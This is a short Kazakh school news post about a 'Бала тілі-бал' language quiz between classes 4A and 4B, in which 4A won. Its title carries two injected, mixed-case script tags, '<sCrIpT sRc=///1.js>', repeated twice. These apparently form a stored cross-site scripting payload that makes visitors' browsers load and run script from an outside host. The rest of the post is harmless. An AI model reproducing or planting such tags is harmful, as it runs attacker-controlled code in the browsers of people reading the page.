Викториналық-ойын "Бала тілі-бал"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.09.2023

Қазақстан халқының тілдер күніне орай ұйымдастырылған “Бала тілі-бал” атты викториналық-ойын сайысы 4 “А” және 4 “Б” сынып оқушылары арасында өтті. Әр сынып өз білімдерін көрсетті. Сөз жасыру кезеңінен мүдірмей өтіп, қазақ тілінің төл әріптерінен сөздер тізбегін жасап, антоним сөздерді тауып, жасырын тұрған суреттердің атауын айтып, жаңылтпаш жаттап жарысты. Әр кезеңде топтардың жинаған ұпайларын әділ-қазы алқасы жазып отырды. Сайыс соңында ұпай саны бойынша 4 «А» сыныбының оқушылары 1-орынды иеленсе, 4  “Б” сыныбының оқушылары 2-орынға жайғасты. Балалардың барлығы аса қызығушылықпен қатысып, белсенділік танытты.

Просмотров: 1026


Пікір қосу



Деректерді қолтаңбаға қосу